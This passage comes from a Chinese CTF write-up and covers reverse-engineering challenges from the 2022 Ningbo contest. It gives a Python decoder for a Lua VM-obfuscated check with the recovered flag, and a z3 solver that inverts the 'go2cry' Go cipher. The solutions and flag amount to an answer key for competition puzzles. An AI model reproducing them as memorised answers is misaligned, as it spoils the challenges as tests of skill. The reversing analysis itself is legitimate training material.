    input_byte[19] = 11
    input_byte[19] = 9
    input_byte[19] = 29
    input_byte[19] = 40
    input_byte[19] = 5
    input_byte[20] = 20
    input_byte[20] = 35
    input_byte[20] = 26
    input_byte[20] = 29
    input_byte[20] = 21
    input_byte[21] = 31
    input_byte[21] = 19
    input_byte[21] = 8
    input_byte[21] = 1
    input_byte[21] = 4
    input_byte[22] = 37
    input_byte[22] = 39
    input_byte[22] = 25
    input_byte[22] = 12
    input_byte[22] = 20
    input_byte[23] = 17
    input_byte[23] = 24
    input_byte[23] = 19
    input_byte[23] = 1
    input_byte[23] = 9
    input_byte[24] = 19
    input_byte[24] = 18
    input_byte[24] = 11
    input_byte[24] = 28
    input_byte[24] = 21
    input_byte[25] = 7
    input_byte[25] = 6
    input_byte[25] = 6
    input_byte[25] = 31
    input_byte[25] = 8
    input_byte[26] = 9
    input_byte[26] = 22
    input_byte[26] = 13
    input_byte[26] = 14
    input_byte[26] = 30
    input_byte[27] = 7
    input_byte[27] = 19
    input_byte[27] = 34
    input_byte[27] = 3
    input_byte[27] = 9
    input_byte[28] = 39
    input_byte[28] = 16
    input_byte[28] = 28
    input_byte[28] = 15
    input_byte[28] = 15
    input_byte[29] = 26
    input_byte[29] = 19
    input_byte[29] = 11
    input_byte[29] = 15
    input_byte[29] = 27
    input_byte[30] = 29
    input_byte[30] = 32
    input_byte[30] = 11
    input_byte[30] = 26
    input_byte[30] = 33
    input_byte[31] = 13
    input_byte[31] = 10
    input_byte[31] = 11
    input_byte[31] = 8
    input_byte[31] = 12
    input_byte[32] = 14
    input_byte[32] = 21
    input_byte[32] = 13
    input_byte[32] = 9
    input_byte[32] = 13
    input_byte[33] = 21
    input_byte[33] = 9
    input_byte[33] = 24
    input_byte[33] = 27
    input_byte[33] = 23
    input_byte[34] = 10
    input_byte[34] = 7
    input_byte[34] = 24
    input_byte[34] = 8
    input_byte[34] = 39
    input_byte[35] = 8
    input_byte[35] = 30
    input_byte[35] = 21
    input_byte[35] = 37
    input_byte[35] = 20
    input_byte[36] = 30
    input_byte[36] = 26
    input_byte[36] = 2
    input_byte[36] = 17
    input_byte[36] = 29
    input_byte[37] = 22
    input_byte[37] = 8
    input_byte[37] = 31
    input_byte[37] = 16
    input_byte[37] = 8
    local b = "vm_end"  -- marker string, never used
    local c = "vm_check"
    tv:setText(c)  -- the only observable effect: the view always shows "vm_check"
end
# Operation list lifted from the Lua script: five values per output byte, consumed
# last-to-first. A value above 19 is xored in, 10..19 is subtracted, below 10 is added.
op_num = [23, 5, 33, 11, 14, 10, 21, 7, 40, 12, 32, 32, 35, 13, 14, 26, 7, 25, 25, 1, 3, 4, 13, 27, 5, 25, 13, 1, 33,
          38, 33, 24, 31, 17, 24, 20, 26, 8, 20, 40, 25, 18, 3, 7, 34, 26, 37, 8, 15, 28, 31, 21, 31, 19, 21, 19, 3, 37,
          13, 20, 18, 12, 15, 3, 4, 33, 21, 33, 7, 18, 15, 23, 3, 12, 40, 11, 32, 25, 34, 36, 9, 9, 37, 19, 27, 36, 10,
          30, 14, 14, 10, 34, 6, 31, 27, 11, 9, 29, 40, 5, 20, 35, 26, 29, 21, 31, 19, 8, 1, 4, 37, 39, 25, 12, 20, 17,
          24, 19, 1, 9, 19, 18, 11, 28, 21, 7, 6, 6, 31, 8, 9, 22, 13, 14, 30, 7, 19, 34, 3, 9, 39, 16, 28, 15, 15, 26,
          19, 11, 15, 27, 29, 32, 11, 26, 33, 13, 10, 11, 8, 12, 14, 21, 13, 9, 13, 21, 9, 24, 27, 23, 10, 7, 24, 8, 39,
          8, 30, 21, 37, 20, 30, 26, 2, 17, 29, 22, 8, 31, 16, 8]
# expected output bytes; decoded in place below
cipher = [0x66, 0x00000080, 0x0000005D, 0x00000075, 0x00000095, 0x0000003D, 0x0000004B, 0x0000005B, 0x000000A0,
          0x0000000C, 0x0000002F, 0x0000006E, 0x0000005A, 0x00000081, 0x00000044, 0x00000053, 0x0000000E, 0x00000070,
          0x0000005E, 0x00000008, 0x00000014, 0x00000035, 0x00000020, 0x00000066, 0x0000009F, 0x00000033, 0x00000049,
          0x00000046, 0x0000006B, 0x0000004D, 0x0000002F, 0x0000005E, 0x00000062, 0x0000000F, 0x00000053, 0x00000067,
          0x0000005D, 0x00000084]
k = 0
for base in range(0, len(op_num), 5):
    for step in reversed(op_num[base:base + 5]):
        if step > 19:
            cipher[k] ^= step
        elif step > 9:
            cipher[k] -= step
        else:
            cipher[k] += step
    k += 1
print(''.join(chr(v) for v in cipher), end='')
#flag{7dac6284cea9d861034f73df34861ae5}
Reverse
go2cry
8位一组加密,共计4组
part 1
简单单字节操作
循环结构如下
for i in range(0, 4, 3)
而后调用math_big___ptr_Int__SetInt64
转为int64
math_big_nat_setBytes
转为big-endian
part 2
而后进入异或循环,v14有符号,通过判断符号正负确定是否异或
part 3
最后进入位操作,看起来很复杂,实际上只是将每个字节按照位序拼接
化简运算之后
# Stage 3 of the cipher, simplified: rotate every byte left by 5, then transpose
# bits so that output byte k collects bit (7-k) of each rotated byte, MSB first.
revs = [0x4C, 0xB2, 0x06, 0xFE, 0x4C, 0xA8, 0xDE, 0x60]
rotated = [ROL(b, 5, 8) for b in revs]
enc = [0] * 8
for k in range(8):
    for m in range(8):
        bit = (rotated[m] >> (7 - k)) & 1
        enc[k] |= (bit * 0x80) >> m
print([bin(r)[2:].zfill(8) for r in rotated])
print([bin(i)[2:].zfill(8) for i in enc])
# ['10001001', '01010110', '11000000', '11011111', '10001001', '00010101', '11011011', '00001100']
# ['10111010', '01110010', '00000000', '01010110', '10011011', '01010101', '01010010', '10011110']
完整脚本如下
from z3 import *
def ROL(data, shift, size=32):
    """Rotate `data` left by `shift` bits inside a `size`-bit word (shift taken mod size)."""
    shift %= size
    keep = (1 << (size - shift)) - 1   # bits that stay inside the word after shifting
    wrapped = data >> (size - shift)   # bits pushed out on the left, re-entering on the right
    return ((data & keep) << shift) + wrapped
def ROR(data, shift, size=32):
    """Rotate `data` right by `shift` bits inside a `size`-bit word (shift taken mod size)."""
    shift %= size
    low = data & ((1 << shift) - 1)    # bits that fall off the right end
    return (low << (size - shift)) + (data >> shift)
def solves(res):
    """Invert one 8-byte block: model the three encryption stages over symbolic
    bytes, constrain the result to the target block and print the model.

    res: the 8 expected output bytes of this block. Raises AssertionError when
    the constraints are unsatisfiable.
    """
    sol = Solver()
    raw = [BitVec(f"flag[{i}]", 8) for i in range(8)]
    inp = list(raw)
    # stage 1: xor mixing over the byte triples starting at 0 and 3
    for base in (0, 3):
        first = inp[base] ^ inp[base + 2]
        inp[base] = first
        second = first ^ inp[base + 2] ^ inp[base + 1]
        inp[base + 1] = second
        inp[base + 2] = inp[base + 2] ^ second
    # stage 2: 64 rounds of shift-left-and-conditional-xor on the 64-bit concatenation
    v14 = Concat(*inp)
    for _ in range(64):
        v14 = (v14 * 2) ^ (((v14 >> 63) & 1) * 0x2EF20D07161E85F7)
    # stage 3 works on the bytes of v14, least significant first
    inp3 = [Extract(8 * i + 7, 8 * i, v14) for i in range(8)]
    # instead of modelling the bit transposition + rotate, undo it on the expected
    # block: bit column i of the target, rotated right by 5
    expected = []
    for i in range(8):
        column = 0
        for j in range(8):
            column = (column << 1) + ((res[j] >> (7 - i)) & 1)
        expected.append(ROR(column, 5, 8))
    for sym, val in zip(inp3, expected):
        sol.add(sym == val)
    assert sol.check() == sat
    mol = sol.model()
    print(bytearray([mol.eval(i).as_long() for i in raw]))
# expected ciphertext: 32 bytes, i.e. four independent 8-byte blocks
cmpdata = [0xC8, 0x34, 0x59, 0x4E, 0xC0, 0xD5, 0xAD, 0x08, 0xC9, 0x2B, 0x4C, 0xDA, 0xE6, 0xC0, 0x9A, 0x19, 0xB5, 0x10, 0x55, 0x7D, 0xE8, 0xF5, 0x83, 0xFF, 0x74, 0x8B, 0xE3, 0xD4, 0x6A, 0x7D, 0x44, 0x58]
for start in range(0, len(cmpdata), 8):
    solves(cmpdata[start:start + 8])
原文始发于微信公众号(7coinSec):【7coin】2022宁波市赛WriteUp